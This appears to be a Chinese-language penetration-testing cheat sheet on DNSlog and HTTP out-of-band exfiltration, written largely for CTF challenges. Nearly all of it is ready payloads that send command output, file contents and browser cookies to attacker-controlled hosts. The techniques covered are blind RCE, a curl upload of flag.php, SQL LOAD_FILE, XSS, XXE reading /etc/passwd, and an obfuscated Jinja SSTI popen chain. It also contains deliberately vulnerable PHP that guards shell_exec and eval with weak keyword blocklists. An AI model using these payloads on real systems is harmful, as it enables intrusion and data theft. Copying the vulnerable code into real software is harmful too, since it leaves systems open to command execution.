dns外带

渗透安全

DNSlog外带技巧详解

一、原理核心

DNSlog外带利用DNS协议层级穿透性强的特点,通过构造特殊域名查询将敏感数据外传。数据以子域名形式发送至攻击者控制的DNS服务器,服务器记录查询日志实现数据回传。

二、基础用法

1
2
# 基础命令执行示例
ping -c 1 `whoami`.YoungKing.eyes.sh

三、无回显RCE

1
2
3
# 无回显命令执行示例
curl http://vbruus9t.requestrepo.com/?1= `ls`
/?cmd=curl http://YoungKing.eyes.sh/?1= `ls`

四、过滤样式绕过

无回显示例

1
2
3
4
5
6
7
8
9
<?php  
error_reporting(0);  
highlight_file(__FILE__);  
$cmd=$_GET['cmd'];  

if(!preg_match("/flag|dnslog/i",$cmd)){     
    shell_exec($cmd);  
}  
?>
1
2
3
4
5
6
7
8
9
10
11
<?php  
error_reporting(0);  
highlight_file(__FILE__);  
//flag.php  
if($F = @$_GET['F']){  
    if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){  
        eval(substr($F,0,6));  
    }else{  
        die("6个字母都还不够呀?!");  
    }  
}

文件内容外带

1
2
3
# 由于无法解析换行,经常需要base64编码
curl http://YoungKing.eyes.sh/?1= `ls .|base64`
curl http://vbruus9t.requestrepo.com/?1= `ls .|base64`

Collaborator示例

1
?F=`$F`;+curl -X POST -F xx=@flag.php http://5djwt01qp1saqhwosujdblpjcai16rug.oastify.com

五、高阶应用场景

1. 无回显命令执行

1
2
3
4
5
# 多级命令嵌套
curl "http://$(uname -a|base64|tr +/ -_).YoungKing.eyes.sh"

# 文件内容外带(前30字符)
curl "http://$(head -c30 /flag|xxd -p).YoungKing.eyes.sh"

2. SQL盲注外带

1
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT MID(flag,1,30) FROM flag),'.mysql.YoungKing.eyes.sh.eyes.sh\\test'));

3. XSS绕过CSP

1
2
<!-- 当CSP禁止fetch/XMLHttpRequest时 -->
<script>location='http://'+document.cookie.substr(0,50)+'.xss.target.eyes.sh'</script>

4. XXE盲打

1
2
<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param "<!ENTITY % exfil SYSTEM 'http://%payload;.xxe.target.eyes.sh'>">

5. SSTi print过滤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
?name=
{%set a=dict(po=aa,p=aa)|join%}
{%set j=dict(eeeeeeeeeeeeeeeeee=a)|join|count%}
{%set k=dict(eeeeeeeee=a)|join|count%}
{%set l=dict(eeeeeeee=a)|join|count%}
{%set n=dict(eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee=a)|join|count%}
{%set m=dict(eeeeeeeeeeeeeeeeeeee=a)|join|count%}
{%set b=(lipsum|string|list)|attr(a)(j)%}
{%set c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}
{%set d=(b,b,dict(getit=cc,em=aa)|join,b,b)|join%}
{%set e=dict(o=cc,s=aa)|join%}{% set f=(lipsum|string|list)|attr(a)(k)%}
{%set g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-l)%}
{%set p=((lipsum|attr(c))|string|list)|attr(a)(n)%}
{%set q=((lipsum|attr(c))|string|list)|attr(a)(m)%}
{%set i=(dict(curl=aa)|join,f,p,dict(cat=a)|join,f,g,dict(flag=aa)|join,p,q,dict(YoungKing=a)|join,q,dict(eyes=a)|join,q,dict(sh=a)|join)|join%}
{%if ((lipsum|attr(c))|attr(d)(e)).popen(i)%}
dnslogyyds
{%endif%}